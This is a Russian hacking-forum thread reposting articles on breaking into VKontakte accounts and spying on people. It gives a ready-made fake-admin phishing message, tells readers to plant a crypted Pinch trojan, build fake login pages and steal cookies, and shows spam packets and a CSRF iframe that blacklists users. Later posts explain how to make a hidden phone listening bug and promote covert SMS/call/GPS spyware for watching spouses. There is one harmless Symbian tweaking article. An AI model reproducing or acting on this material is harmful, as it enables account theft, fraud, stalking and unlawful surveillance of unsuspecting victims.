Статья написана для новичков и если 'гуру' начнут критиковать то я предупреждал(могот быть "оскробления" в вашь адресс)...Я любитель СИ но + я подобрал ешо некоторый интересный материал по етой теме...
Начинаем
1)Регистрируем аккаунт и переделываем его под тех.поддержку(в самом низу страницы).Далее пишем сообщение жертве:
Сообщение от Администрации.
Уважаемыйая .
На наш сайт был нанесен удар хакерами и
некоторые базы пользователей пострадали.
Если вы хотите сохранить свой аккаунт,
то, пожалуйста, оставьте нам сообщение
с вашим email и паролем.В противном
случае ваш аккаунт будет удален безвозвратно.
Будьте внимательны, не попадайтесь на уловки мошенников!
С уважением Администрация vkontakte.ru
2)Регистрируем аккаунт противоположного пола, и просим мол попереписываться по emailам ,ну или что-то типо того, цель узнать email.Потом заходим в забыли пароль (например на майл ру или чьей фирме принадлежит домен)и пробуем взломать,если не получается то АККУРАТНО спрашиваем у жертвы.
3)Знакомимся и впихиваем пинча .Перед этим его нужно будет закриптовать, пабликовский криптор палится антитварями и чтобы этого недопустить пишем криптор сами или покупаем.
4)Делаем фейк страницы и через левую асю знакомимся с жертвой..ну и типо кидаешь ссылку чтбы посмотреть фотки…жертва будто захоит на свою страницу а пасс и email прилетают вам.(Самое главное URL сделать максимально похожий!!!)
5)Узнаем email(из выше перечисленных способов),регистрируемся на сайте типо na-s.ru и кидаем адрес картинки пользователю на мыло. Поздравляю Куки украдены.Скачиваем минибраузер или сами подставляем куки.И как всегда просим выслать пароль на мыло(это вконтакте).Только незабудьте удалить это сообщение.
6)Если вы азбираетесь в сайтостроении то можете сделать сайт напиханный пинчарой и т.п.Тоесть чтобы когда жертва перешла на сайт то троян скомуниздил пароль.
7)Брут для vkontakte.ru.Думаю описывать не стоит, всем и так понятно что это.
<span style="display: block; text-align: center"><!--coloro: aqua-->[color= aqua]<!--/coloro-->Небольшой + (собрано самое интересное)<!--colorc-->[/color]<!--/colorc--></span>
<div class="code-box"><strong class="legend">Код:</b><div class="blockcode"><div class="scrollbox" style="height: 35em"><pre>Если у тебя много друзей и тебе каждый раз лень их отмечать на видео или фото то надо следовать инструкции1)Вначале ты входишь в видео!2)Нажимаешь отметить!3)третий шаг там где написано http://www.vkontakte.ru/?????????ты всё удаляеш и вставляешь следующий текст!4)java script:for(blabla=0;blabla<5000;blabla++){ var elem = document.getElementById('f'+blabla); if(elem == null) break; elem.onclick(); }5)Удаляешь пробел между java script6)Нажимаешь энтер и он отмечает сам7)И пишем спасибо создателю>>http://vkontakte.ru/id200294168)Размести надпись которая написана после стрелочек у себя на стене(в контакте) буду очень благодарен>>>>>>http://www.bj-chat.narod.ru от туда можно качать видео, музыку и просто сидеть в чате!!! делают видео и музыку на заказ!!!Для просмотра закрытого профиля требуется:Узнать ID пользователя. Делается это легко, наводим мышку на "Друзья ИМЯ". Копируем ссылку.http://vkontakte.ru/friend.php?id=ЦИФОРКИЦИФОРКИ после "id=" и есть ID профиля.Копируем эти цифры и вставляем в нужные нам ссылки:Пример :http://vkontakte.ru/friend.php?id="20029416"Мы копируем то что указано в кавычках!!Фотографии со мной:http://vkontakte.ru/photos.php?act=user&id=ЦЫФОРКИФотоальбомы:http://vkontakte.ru/photos.php?id=ЦЫФОРКИВидеозаписи:http://vkontakte.ru/video.php?id=ЦЫФОРКИЗаметки:http://vkontakte.ru/notes.php?id=ЦЫФОРКИМнения о человеке:http://vkontakte.ru/opinions.php?id=ЦЫФОРКИДля того чтобы быстро пригласить всех своих друзей в группу достаточно тока вставить текст в строку браузера(текст ниже)java script:function addall(){ var butt_all=” Выделить всех “;j=0;var div_s=document.getElementsByTagName(’div’);for(var i=0;i’+div_s[i].innerHTML;} }} }addall();Женить себя на себе.Фишка не особо полезная, но зато забавная. Для её использования лучше пользоваться браузером OPERA Заходите на страницу редактирования своего профиля: http://vkontakte.ru/profileEdit.php Выберайте семейное положение “Женат”. после этого открывайте исходный код страницы(в опере это ctrl+U). там находите html код выподающего списка и вконец вставляете себя: Я Затем жмете “Применить изменения” и на странице редактирования выбираете себя в списке и сохраняйте профиль. теперь вы женаты сами на себе))) Таким же способом можно менять год рождения, учебы, службы. А если поставить какойнибудь год рождения типа 11112008 то ваш возраст будет минус 1111000.2. Легальный способ повышения рейтинга заполняя анкету. процентное соотношение:Фотография - 25% Личная информация (увлечения) - до 20%, хитрая зависимость от того, как заполнено Вуз - 5% Школа со всеми данными…. - 20% Карьера - 10% О себе: - 10% - пол - 2% - семейное положение - 2% - дата рождения (полностью) - 2% - родной город - 2% - политические взгляды - 1% - религиозные взгляды - 1%) Места - 10% (1 место - 1%, если до 10 штук) Контактная информация - 10% мобильный телефон - 4% ICQ - 4% домашний телефон - 2%)3. Вставить какой-либо спец-символ (звёздочка, чердечка, пр.) нужно либоа) нажать комбинацию клавишь “alt” и какую-либо цифру с правой стороны клавиатуры! для сердечка нужна 3…! ))б) Пуск>Стандартные>Служебные>Таблица символов Там все символы и комбинации клавиш к ним. Например ® - Alt+0174 (Примечание: в этой таблице символов символов дофига, но копируются в контакт не все!, атолько те, у которых в правом нижнем углу таблицы написана комбинация клавиш)Примечание #2:ЧТОБЫ ПОЛУЧАЛОСЬ, НУЖНО ЧТОБЫ КЛАВИША NumLock БЫЛА ВКЛЮЧЕНА. Тогда все у всех получиться.P.S. Для пользователей мак мака - соответственно вместо ALT используем OPTION =)Также можно скопировать и вставить нужный вам символ отсюда:+•В¦¬Х¦CНО™)®>•OOOOOO¦¦¦¦¦¦¦¦¦¦•••0O?v?$¦••0¦¦¦O•OOO¦¦56¦••;90?¦+??????©¶?{ceIO’I?? + A? ? ? ? ? ? ? ї ? С ? L ? ?????¦“L?¦ОS§AA6§6¦¦E••b“q{¦¦•0¦¦d d4. Посмотреть историю изменения статуса любого пользователя. последние 10 изменений.Зайдите на страницу пользователя. Адрес в браузерной строке выглядит так:http://vkontakte.ru/profile.php?id=[ID пользователя]и добавьте в конце строки:&activityhistory=1что бы получилось:http://vkontakte.ru/profile.php?id=[ID пользователя]&activityhistory=1и нажмите ENTER.теперь вы можете видеть историю изменения.5. Как пригласить сразу всех друзей в группу1) Зайдите в "Пригласить в группу"2) Скопируйте в адресную строку следующее :java script:function addall(){var butt_all='[>>>Приглашаааем!<<<] '; j=0; var div_s=document.getElementsByTagName("div");for(var i=0;i 3) Уберите пробел между "java ( ) script" (с самого начала)4) Нажмите "Enter"Над списком с друзьями, перед "Пригласите Друзей" - появится надпись - "Приглашааааем", нажимайте на эту надпись и все друзья выделятся!(надпись"Приглашааааем" под курсором не выделяеться, просто кликните по любой из букв) 4) Нажмите кнопку "Выслать приглашения"6. Как пригласить всех друзей на встречу1. Копируем "java script:for(var i = 0; i < 5000; i++) document.inviteFriends.elements[i].checked = true" без кавычек.2. Вставляем в адресную строку браузера.3. Удаляем пробел между java и script.4. Жмём ENTER - выделятся все Ваши друзья.5. Жмём пригласитьМелкие пакости vkontakteДля кого-то потребуется дельфи 6,7/ C/ php.. для отправки пакетов.Так же можно использовать программу inetCrack, в которой уже реализован метод приёма и передачи TCP пакета.Всё, что будет ниже описано, исключительно для новичков. Ну что, перейдём к делу.1. Спам по личкам.{маленький пример на дельфи}--------------------------------------------------Создаём форму и закидываем на неё ClientSocketServerSocketMemo1Memo2Button1Butt on2Цитата{создаём сервер}procedure TForm1.FormCreate(Sender: TObject);beginServerSocket1.Port:=1488;ServerSocket1.Active:=true;memo1.Clear;me
mo2.Clear;button1.Caption:='подкл.';button2.Caption:='посылаем';end;{будем принимать данные с 8888 порта в memo1}procedure TForm1.ServerSocket1ClientRead(Sender: TObject;Socket: TCustomWinSocket);beginmemo1.Lines.Text:=socket.ReceiveText;end;{активируем клиент}procedure TForm1.Button1Click(Sender: TObject);beginClientSocket1.Host:='vkontakte.ru';ClientSocket1.Port:=80;ClientSocket1.Active:=true;end;{посылаем данные}procedure TForm1.Button2Click(Sender: TObject);beginClientSocket1.Socket.SendText(memo1.Lines.Text);end;{ответ от vkontakte.ru будет в memo2}procedure TForm1.ClientSocket1Read(Sender: TObject;Socket: TCustomWinSocket);beginmemo2.Lines.Text:=socket.ReceiveText;end;Заходим http://vkontakte.ru/mail.php?act=write, указываем тему и текст сообщения.Далее настраиваем браузер через веб прокси 127.0.0.1:1488Компилируем и запускаем проект, а в браузере тыкаем кнопку отправить.. в memo1 появится пакет, который посылает ваш браузер. {упрощённый вариант}Нажимаем кнопку отправить, тем самым мы отправляем сообщение по указанному адресату.Пример пакета:ЦитатаPOST http://vkontakte.ru/mail.php HTTP/1.0User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en)Host: vkontakte.ruAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru,en;q=0.9Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Cookie: remixInformation=1; remixAdminsBar=0; remixforums=1; remixlang=0; remixGroupType=0; remixourEvents=1; remixRecentNews=1; remixfriends=1; remixopinions=1; remixfriendsOnline=1; remixastatus=1; remixvideos=0; remixnotes=1; remixfriendsCommon=1; remixlinksBar=1; remixaudios=1; remixpersonal=0; remixwall=1; remixmid=452418; remixemail=fuck%40mail.ru; remixpass=872486652hf34124; remixalbums=1; remixref=452418; remixchk=5; remixeducation=0; remixclosed_tabs=0; remixfilters=279; remixautobookmark=14Cookie2: $Version=1Proxy-Connection: closeContent-Length: 121Content-Type: application/x-www-form-urlencodedact=sent&misc=1&to_reply=0&to_ids%5B%5D=3116221&members_name=&to_id=3116221&title=111111111&toFriends=1&message=222222222Рассматриваем последнюю строку, "act=sent&misc=1&to_reply=0&to_ids%5B%5D=3116221&members_name=&to_id=3116321&title=111111111&toFriends=1&message=222222222"to_id=3116321&title=111111111&toFriends=1&message=222222222Тут всё предельно просто, для того, что бы написать спамер, нужна смена последней строки и посылка пакета.Так же не забывайте учитывать Content-Length: 121 - кол-во символов последней строки. По аналогии можно спамить и стены.--------------------------------------------------2. Автоматическая смена имя&фамилия&никДействуем так же.Пример пакета:ЦитатаPOST http://vkontakte.ru/settings.php HTTP/1.0User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en)Host: vkontakte.ruAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru,en;q=0.9Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Cookie: remixInformation=1; remixAdminsBar=0; remixforums=1; remixlang=0; remixGroupType=0; remixourEvents=1; remixRecentNews=1; remixfriends=1; remixopinions=1; remixfriendsOnline=1; remixastatus=1; remixvideos=0; remixnotes=1; remixfriendsCommon=1; remixlinksBar=1; remixaudios=1; remixpersonal=0; remixwall=1; remixmid=452418; remixemail=fuck%40mail.ru; remixpass=872486652hf34124; remixalbums=1; remixref=452418; remixchk=5; remixeducation=0; remixclosed_tabs=0; remixfilters=279; remixautobookmark=14Cookie2: $Version=1Proxy-Connection: closeContent-Length: 145Content-Type: application/x-www-form-urlencodedact=change_name&hash=7013d90741dh5711284841182&nickname=Noctambulaar&subm=1&first_name=myfirstname&last_name=mylastnameНадеюсь у Вас получится написать автосмену, как у меня, рэндом nickfirstlast каждую секунду. хD3. Украшательства вашего клубаВ этом случае приведу html пример.В сточке <input type="hidden" name="gid" id="gid" value="874628"> подставьте свой id клуба.group.html:group.htmlЧто я добавил?Я изменил input на textarea, тем самым, в названии можно использовать перенос строки. {<br> or n}4. Меняем поля в своём профиле.У себя я изменил поле Религия по примеру 3., все делается по аналогии, input заменяем на textarea.5. Дата рождения.В моём профиле дата рождения установлена 111111. Привожу html пример.Заходим http://vkontakte.ru/profileEdit.php смотрим текст страницы, ищем <input type="hidden" name="hash" id="hash" value=" и заменяем всю строку на строку из html примера, который нижеsploit.htmlsploit.htmlвыбираем дату 31 Мая 66666 года.По аналогии переноса строки можно надругаться над всем.5. Закачка картинки вместо граффити.{готовая реализация}http://www.polus.com.ru/vkontakte.phphttp://www.zilmar.com/viewpage.php?page_id=46. Чёрный список.Хотите, что бы нужный человек добавил другого в черный список?Посылаем человека на страницу с таким кодом.black.htmlЦитата<iframe src=http://vkontakte.ru/settings.php?act=addToBlackList&id=1125629>id конечно же меняем. По аналогии можно много что сделать.group.htmlЧто я добавил?Я изменил input на textarea, тем самым, в названии можно использовать перенос строки. {<br> or n}4. Меняем поля в своём профиле.У себя я изменил поле Религия по примеру 3., все делается по аналогии, input заменяем на textarea.5. Дата рождения.В моём профиле дата рождения установлена 111111. Привожу html пример.Заходим http://vkontakte.ru/profileEdit.php смотрим текст страницы, ищем <input type="hidden" name="hash" id="hash" value=" и заменяем всю строку на строку из html примера, который нижеsploit.htmlsploit.htmlвыбираем дату 31 Мая 66666 года.По аналогии переноса строки можно надругаться над всем.5. Закачка картинки вместо граффити.{готовая реализация}http://www.polus.com.ru/vkontakte.phphttp://www.zilmar.com/viewpage.php?page_id=46. Чёрный список.Хотите, что бы нужный человек добавил другого в черный список?Посылаем человека на страницу с таким кодом.black.htmlЦитата<iframe src=http://vkontakte.ru/settings.php?act=addToBlackList&id=1125629>id конечно же меняем. По аналогии можно много что сделать.</pre></div></div></div>Зы .Прошу сильно статью не критиковать!))
<span style="font-style: italic">ZiLiBoBa antichat.ru</span>

Kestrel
Активный участник
Сообщений: 3552
Зарегистрирован: 26 дек 2010, 12:22

Сообщение Kestrel » 06 май 2009, 12:06

<span style="font-size: 18px"><span style="display: block; text-align: center"><!--coloro: red-->[color= red]<!--/coloro-->Жучок для прослушки своими руками<!--colorc-->[/color]<!--/colorc--></span></span>
<span style="font-style: italic">Автор статьи - Gen1rus с forum.antichat.ru</span>
Не люблю я всяких вступлений, поэтому ближе к делу. В этой "статье" я хочу рассказать как сделать супер жучек для прослушки своими руками.
<!--coloro: yellow-->[color= yellow]<!--/coloro-->
Для это нам потребуется:<!--colorc-->[/color]<!--/colorc-->
1. Мобильный телефон
2. Умение пользоваться им))
Инструменты готовы, приступим...
Берем в наши умелые руки этот самый будущий жучок, т.е. мобильный телефон. Отключаем подсветку, звонок (+вибрацию), вобщем делаем так, чтобы с виду телефон не подавал признаков жизни (если телефон не жалко, можно немного потрескать панельку). Далее, включаем на телефоне функцию автоответ (например 5 секунд), думаю уже догадались для чего...
Ну вобщем всё готово, прячем его куда-нибудь около цветка, уходим, звоним, подслушиваем...  [img]/images/smilies/biggrin.gif[/img]

Kestrel
Активный участник
Сообщений: 3552
Зарегистрирован: 26 дек 2010, 12:22

Сообщение Kestrel » 07 май 2009, 16:38

<span style="font-size: 18px"><span style="display: block; text-align: center"><!--coloro: red-->[color= red]<!--/coloro-->Программа №1 по перехвату смс, звонков, gps<!--colorc-->[/color]<!--/colorc--></span></span>
<!--coloro: yellow-->[color= yellow]<!--/coloro-->Источник - http://4pda.ru/2008/12/30/3844/#more-3844<!--colorc-->[/color]<!--/colorc-->
Появление Шпиона по перехвату смс и звонков, вызвало шквал эмоций со стороны Российского потребителя.
<span style="display: block; text-align: center">Изображение</span>
Программа объединила в себе ряд рациональных решений: это перехват поступающих и исходящих смс, перехват звонков, с отслеживанием их длительности и адресатов, не говоря уже об определении GPS координат и их раскладки по картам Google.
Самой заметной новинкой в линейке Программ шпионов для коммуникаторов стала Программа Ktozvonil. Появлению её на Российском рынке предшествовали слухи и она оправдала самые смелые ожидания. Простота в использовании, мало-мальский трафик и положительная реакция антивирусов – это далеко не все её преимущества.
Программа распространяется Бесплатно, её можно скачать и установить мгновенно на любой коммуникатор или смартфон с ОП windows mobile. Подобный подход способствует разумному расширению бюджетного сегмента. Всем пользователям без исключения предоставляется самостоятельно убедиться в совершенной работе программы- шпиона. Сервис же становиться недоступным, только по истечению 73 часов непрерывного использования. Для его дальнейшей активации, необходимо пополнение счета на аккаунте пользователя.
Достоинства такого подхода смогут оценить как заботливые родители или заинтересованные супруги, так и менеджеры крупных компаний, или же те, кто предпочитает проконтролировать переписку или местонахождение интересующего их человека.
Для тех, кто не гонится за длинными красивыми спецификациями к непонятному софту, а хочет реально проконтролировать человека- это один из лучших вариантов . Просто напросто необходим одноразовый доступ к контролируемому коммуникатору и наличие на нем постоянного или временного Интернет соединения.
Неотъемлемым преимуществом перед другими программами является удобство сервиса ktozvonil.ru, т.к. все данные, поступающие с телефона на сайт, сохраняются там в удобном формате .
После установки программы на устройство, первое на что нужно обратить внимание - это размер исходящего трафика . При передаче 100 смс , 100 звонков и 100 координат тратится 0,1 МГ. Следовательно, заметить утечку трафика, при нормальной деловой активности контролируемого лица, практически невозможно.
Второе на что нужно обратить внимание - это положительное отношение антивирусов к программе, т.к. ktozvonil - это качественный, проверенный временем софт. Но если вы хотите самостоятельно убедиться, что ничего вредоносного не внедрилось в операционную систему, то используйте любой антивирусник для КПК.
Для справки , риск заражения вирусами карманных компьютеров в принципе невысок, поскольку операционная система никогда не допустит исполнения скриптов, полученных при передаче с ПК на КПК, т.к. для этого нет интерпретатора.
Из этого можно сделать вывод, что владелец телефона, на котором стоит программа- шпион, не сможет её обнаружить, даже если у него был установлен антивирус.
Программа Ktozvonil единственная, которая взаимодействует с Таск Менеджером, или иначе с “менеджером задач”. Работая в скрытом режиме, программа перехватывает смс и звонки, но в менеджере задач коммуникатора, это никак не отражается.
<span style="display: block; text-align: center">
Изображение
</span>
Меню у программы несложное, и в отличие от программ конкурентов в нем нет никаких “интуитивно понятных” пиктограмм. И так все предельно просто. Сама программа может похвастаться тем, что она Русскоязычная, и установить её сможет любой человек, владеющий русским языком.
Скачав программу, следуйте инструкции и копируйте её на устройство.
Русская версия программы - ktozvonil, зарубежная версия программы Sherlock Mobile.
<span style="display: block; text-align: center">Изображение</span>
Далее при запуске Sherlock Setup необходимо ввести ID и Пароль.
Сразу после этого на мониторе налодонника появится надпись, которая напомнит Вам о том, что не стоит читать личную переписку другого человека, тем самым нарушая его права.
<span style="display: block; text-align: center">
Изображение</span>
В самом низу дисплея есть две надписи- это Выход и Настройки. В меню Настройки присутствует ряд интересных опций, которые можно настроить и отключить по своему усмотрению (смс, звонки, обновления, удаление). Например, если на телефоне отсутствует GPS модуль, то можно вручную отключить эту функцию, так же изменить,увеличить или уменьшить период времени, через который будет производиться сбор gps координат, или смс и звонков. Всё зависит от пожеланий пользователя и возможностей той или иной модели КПК.
<span style="display: block; text-align: center">Изображение
</span><span style="display: block; text-align: center">
Изображение</span>
Напоминаем, что кнопочка “ОК” в правом верхнем углу КПК только сворачивает приложения, а не закрывает их. В результате нередко возникает ситуация, когда ненужное уже приложение остается активным, это касается и данной программы. Для перехода в скрытый режим необходимо нажать кнопку Выход в нижней левой части экрана коммуникатора.
После установки программы ktozvonil, физического доступа к устройству больше не потребуется. Конечно, если не брать в расчёт удаление программы, или её обновление.
<span style="display: block; text-align: center">
Изображение</span>
Хочется добавить, что подобные программы -шпионы, работают в основном через WiFi , либо через отправку смс с контролируемого телефона на Ваш собственный. Следовательно, такую программу может обнаружить не только взрослый, но и ребёнок.
Ещё одно явное отличие программы Ktozvonil от других программ заключается в радиусе действия. Важно помнить, что другие программы-навигаторы или услуги сотовых операторов, помогают определить местонахождения человека в радиусе 5 км, ktozvonil вычисляет с точностью до 5 метров. Предлагаемая программа работает на любом устройстве, вне зависимости от оператора связи и страны нахождения.
И открытым остаётся последний вопрос: “кому и с какой целью можно использовать данный программный продукт?”
Ответ прост:
1. Безопасность собственных детей.
2. Не меньше заинтересованы в получении ценной информации работодатели.
3. Заинтересованные супруги.
4. Для мониторинга смс и звонков в личных целях.
В качестве заключения,нужно добавить, что при установке программы ktozvonil на телефон третьего лица, без его ведома, сервис ktozvonil ответственности не несёт.

Kestrel
Активный участник
Сообщений: 3552
Зарегистрирован: 26 дек 2010, 12:22

Сообщение Kestrel » 08 май 2009, 12:04

<span style="font-size: 18px"><span style="display: block; text-align: center"><!--coloro: red-->[color= red]<!--/coloro-->Измени свой смарт!<!--colorc-->[/color]<!--/colorc--></span></span>
<span style="font-style: italic">Автор статьи - Krist_ALL с forum.antichat.ru</span>
Со смарфтонами, под управлением Symbian 8, можно сделать много интересных вещей, а именно: сильно изменить интерфейс, повысить быстродействие, снять штатные ограничения на некоторую функциональность. В этой статье я расскажу обо всем этом в подробностях.
<!--coloro: yellow-->[color= yellow]<!--/coloro-->Внешний вид:<!--colorc-->[/color]<!--/colorc-->
Красивой темой или логотипом сейчас никого не удивишь, да и многие сами научились делать свои темы (Theme studio), а вот анимированный логотип на основном фоне и экзотический шрифт есть не у каждого. Да, это замедлит быстродействие телефона, но красота требует жертв. Есть темы, которые около 20 секунд прорисовываются, но тормоза эти можно уменьшить с помощью сжатия памяти appManom и убивания ненужных процессов. Подробно об этом написано в других статьях. Итак, как же нам украсить свой смарт? Самое простое, это установить красивый шрифт. Находим в интернете файл шрифта с расширением GDR, копируем файл в папку С:systemfonts и перезагружаем телефон. Шрифт установлен!
<span style="display: block; text-align: center">
Изображение</span>
<span style="display: block; text-align: center">Вот пример красивого шрифта</span>
<!--coloro: red-->[color= red]<!--/coloro-->ВРЕДНЫЙ СОВЕТ: установить врагу на смартфон нечитаемый шрифт. Например Latha.<!--colorc-->[/color]<!--/colorc-->
Теперь установим анимированную тему. Еще год назад анимированные темы были большой редкостью, сейчас же их легко можно найти на таких известных сайтах как http://www.nokia-lifestyle.ru/ , http://dimonvideo.ru
Анимированная тема состоит их двух частей. Сама тема и приложение, которое анимирует фон. Можно отключить анимирование фона. На сайте http://ownskin.com вы можете создать свою анимированную тему и выложить ее на скачку для других пользователей.
Чтобы поставить анимированную картинку на фон в режиме ожидания, нам понадобится програмка ForeMost. Она написана на pythone. И чтобы программа заработала, придется установить еще и python
<span style="display: block; text-align: center">
Изображение</span>
Вообще питон на смартфоне очень полезная вещь. Можно кодить прямо на мобильнике, а можно пользоваться программами, которые написаны на python. Одна из таких программ.
Запускаем программу ForeMost и видим много возможностей. Можно сделать бегущую строку в режим ожидания, можно поставить анимированную картинку на фон.
Теперь я расскажу про логотип оператора. Нам понадобится изображение в формате bmp размером 95 x 32. Название файла должно быть следующее: country-code_network-code_0.bmp. Значение country code и network code можно узнать с помощью программы system explorer в разделе system info ->current network.
<span style="display: block; text-align: center">
ИзображениеИзображение</span>
Для билайн Москва имя файла будет 250_99_0.bmp
Копируем файл в папку C:system/apps/phone/oplogo/
Если папки phone/oplogo/ нет, то создаем ее.
<span style="display: block; text-align: center">Изображение</span>
К сожалению, на смартфонах с Symbian 8 нельзя сделать анимированный логотип оператора, только на Symbian 9.
<!--coloro: yellow-->[color= yellow]<!--/coloro-->
МНОГОУРОВНЕВОЕ МЕНЮ:<!--colorc-->[/color]<!--/colorc-->
Как известно, официально в смартфонах, работающих под операционной symbian S60, нельзя в главном меню создавать вложенные папки. Чтобы создать вложенный папки, надо переместить папку, которую вы хотите вложить, в верхний левый угол. Допустим, вы хотите в папке “Игры” создать подпапку “От N-gage”.Вот так
<span style="display: block; text-align: center">Изображение</span>
должно выглядеть меню Теперь нужно начать установку или удаление какой-нибудь программы.Как только установка или удаление начнётся, быстро нажимаем красную трубку, затем входим в меню, наводим курсор на любой приложение(именно на приложение, а не на папку), жмём функции и наводим курсор на надпись “в папку” и ждём, поку курсор не поместится на самый левый угол меню, то eсть нашу папку “от N-gage”
<span style="display: block; text-align: center">
Изображение</span>
Теперь нажимаем “в папку” и выбираем папку “игры”. Вот, что получилось .
<span style="display: block; text-align: center">Изображение
</span>
Таким образом можно создавать много уровней папок. Получится очень удобное меню.
Переименование иконок в главном меню
Надо сделать тоже самое, как и в создании подпапки, только вместо “в папку” нажимаем “переименовать”
<span style="display: block; text-align: center">ИзображениеИзображение</span>
<!--coloro: yellow-->[color= yellow]<!--/coloro-->
ФОНОВЫЙ РИСУНОК БЕЗ ПОЛЕЙ:<!--colorc-->[/color]<!--/colorc-->
В режиме ожидания на логотип по бокам накладываются боковые полоски. Когда вы устанавливаете фоновый рисунок, телефон конвертирует файл в *.MBM. Причём делает он это на славу.Фоновый рисунок расположен по адресу С:systemdatabackgroundimage.mbm.Если удалить этот файл и подставить обычный jpg с таким же именем, то телефон не скушает это, т.к ему нужен именно *.MBM.Выход очевиден, конвертировать jpg в mbm!В природе есть только одна программа с этой возможностью=Eimage_Convertor.Конвертируем и переименовываем в backgroundimage.mbm и кидаем в C:systemdata.Перезагружаемся и лбюуемся полноценным рисунком.
<span style="display: block; text-align: center">Изображение</span>
А сейчас давай поговорим о файловой системе смартфонов. Как известно, есть 4 диска: C-память телефона, D – RAM, E-память карты памяти, Z – прошивка (ROM). Но можно создать еще и виртуальные диски с помощью программы VIRUALD, которая написана на pythone. Например можно сделать так, что диск F это C:systemApps . После выключения программы виртуальные диски не исчезают! В программе можно удалять виртуальные диски, но один диск должен обязательно остаться. Чтобы его удалить, надо деинсталировать программу и перезагрузить смартфон.
<span style="display: block; text-align: center">Изображение</span>
Что хранится в файлах и папках по адресу C:system?
А вот что:
C:systeminstall - хранятся инсталы программ, которые были установлены, а так же ведется лог, когда и что ты устанавливал
C:systemdataApplications.bd - В этом файле хранится конфигуация располажения иконок в главном меню. Никогда не удаляй этот файл! Можно сделать копию этого файла, если ты потом захочешь восстановить прежнее расположение иконок в главном меню
C:systemApps – тут хранятся файлы установленных программ. Аля Program Files.
C:systemlibs - библиотеки приложений, суда любит класть свои файлы puthon , а при деинсталяции не удаляет их отсюда.
С:systemmail - здесь хранятся смски
С:systemMidlets - program files, только для java приложений
C:systemdataContacts.cdb – контакты из записной книжки. Чтобы перенести все контакты из телефонной книги на карту памяти,это может пригодится, если ты собираешься форматировть телефон, а контакты терять не хочется, надо перенести файл “Contacts.cdb” на карту памяти
<span style="display: block; text-align: center">Изображение</span>
<!--coloro: yellow-->[color= yellow]<!--/coloro-->
СКРЫТИЕ ФАЙЛОВ И ПАПОК ИЗ ДИСПЕТЧЕРА ФАЙЛОВ<!--colorc-->[/color]<!--/colorc-->
Чтобы файл или папка стали нивидимыми в диспетчере файлов надо с помощью программы System Exploer выставить атрибут hide (скрытый) в программе system explorer.
Таким образом, можно сделать так, что скрытая папка system будет видна в диспетчере файлов, надо просто снять у папки system атрибут “скрытая”
Теперь я расскажу о полезных программах для твоего смартфона.
Sound forge-музыкальный нотный редактор. Эта мощная программа имеет интуитивный интерфейс, что является существенным плюсом. Лучше не найти. Формат sis. Для Symbian 7,8
<span style="display: block; text-align: center">
Изображение
</span>
Cool SMS+ -отправка flash-sms и wap-push прямо со смарта. Программа не использует интернет, а отправляет смс, как обычные. Программа интегрируется в меню сообщения->новое->cool sms+. Формат sis. Symbian 7,8
<span style="display: block; text-align: center">ИзображениеИзображение</span>
Paint CAD-"фотошоп" на мобиле! Эта прога переплюнула все аналоги на сотовых. Установив Paint CAD, в твоем распоряжение будет 256 цветов, 11 эфектов, инструменты сглаживания, огранка, градиент, обрисовка, и еще море интересново. На сайте программы присутствует галерея шедевров, созданных с помощью этой проги. Для настоящих художников! Формат jar http://mobile-proff.ru/images/paintcad.JPG
<span style="display: block; text-align: center">Изображение</span>
<span style="display: block; text-align: center">Telnet – без комментариев</span>
<span style="display: block; text-align: center">Изображение</span>
<span style="display: block; text-align: center">Putty – тоже без комментариев)</span>
<span style="display: block; text-align: center">
Изображение</span>
<span style="display: block; text-align: center">Изображение</span><span style="display: block; text-align: center">
EzSniffer – снифер у тебя на смартфоне. Снифает твой gprs трафик</span>
Scientific Grafical Calculator-находка для студентов -мощнейший графический инженерный калькулятор который существует на symbian. Я повторю-инженерный! Умеет строить графики, куча функций, сохранение констант
<span style="display: block; text-align: center">Изображение</span>
Earth Exploer-земной шар на твоей мобиле, помоему очень интересная программа. Показывает название континентов, поддерживается вращение вверх, вниз, влево, вправо а также увеличение с одновременным вращением. Формат jar.
Dros-соскучился по dos? Теперь в твоем мобильном. Имеется доступ к файловой системе, если она открытая конечно.
ALON SCREENSHOT CAPTURE - Программа делает скриншот экрана мобльиника и сохраняет скрин в jpg/gif/mbm
И на закуску – ubuntu! Эмулятор вернее). Один вид, из функций только одна игра. Только ради прикола.
Файлы:
Putty
Telnet
PaintCAD
ALON ScreenCapture
SystemExplorer
Calculator
Некоторые файл не только для смартфонов. тоесть jar.
По поводц symbian 9, мне есть что рассказать, но как-нибудь попозже. Также много полезной информации вы сможете найти на моем сайте Http://mobile-proff.ru .

Kestrel
Активный участник
Сообщений: 3552
Зарегистрирован: 26 дек 2010, 12:22

Сообщение Kestrel » 10 май 2009, 12:38

Инструкция по взлому автоматов с Кока-Колой:
http://rapidshare.com/files/86033951/CocaCola.mp4
[img]/images/smilies/biggrin.gif[/img]

Kestrel
Активный участник
Сообщений: 3552
Зарегистрирован: 26 дек 2010, 12:22

Сообщение Kestrel » 17 май 2009, 12:20

<span style="font-size: 18px"><span style="display: block; text-align: center"><!--coloro: red-->[color= red]<!--/coloro-->Пинч или не пинч<!--colorc-->[/color]<!--/colorc--></span></span>
<span style="font-style: italic">Автор vidocq89</span>
А что кроме пинча?
Для начала обговорю следующее: в статье не будет идти разговор о том как взломать блондинку или «мачо» сидящих на девятизнакакх и просто жаждущих познакомиться и обменяться фотками. Речь будет идти так: предпологается что пользователь знает хорошо о том, что такое Троян пинч и с чем его едят, также он знает о существовании антивирусов, фаерволов, антишпионов и хакеров. Также у пользователся стоят пароли сложнее чем 123456 и mypass.
А теперь начнем…
НО тут я должен оговориться – лучше всего вам познакомиться с человеком с этим и заслужить его уважение и доверие, но если вы думаете, что это произойдет просле пары приветствий и обмена фотками в jpg формате, то вы сильно ошибаетесь.
Допустим нам нужно ломануть конкретного чела или просто «примерно» конкретного чела – т.е чела например из какой либо группы, сформированной по выбранному вами критерию (например негры).
